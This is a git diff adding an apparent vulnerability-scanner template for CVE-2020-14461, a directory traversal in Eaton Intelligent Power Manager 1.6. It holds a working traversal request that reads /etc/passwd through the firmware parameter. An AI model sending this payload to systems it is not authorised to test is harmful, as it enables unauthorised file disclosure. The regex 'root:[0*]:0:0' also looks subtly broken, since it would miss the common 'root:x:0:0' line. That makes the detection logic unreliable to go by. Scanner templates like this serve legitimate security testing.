diff --git a/cves/2020/CVE-2020-14461.yaml b/cves/2020/CVE-2020-14461.yaml new file mode 100644 index 0000000000..748517d9db --- /dev/null +++ b/cves/2020/CVE-2020-14461.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-14461 + +info: + name: Eaton Intelligent Power Manager 1.6 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2020-14461 + - https://www.exploit-db.com/exploits/48614 + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200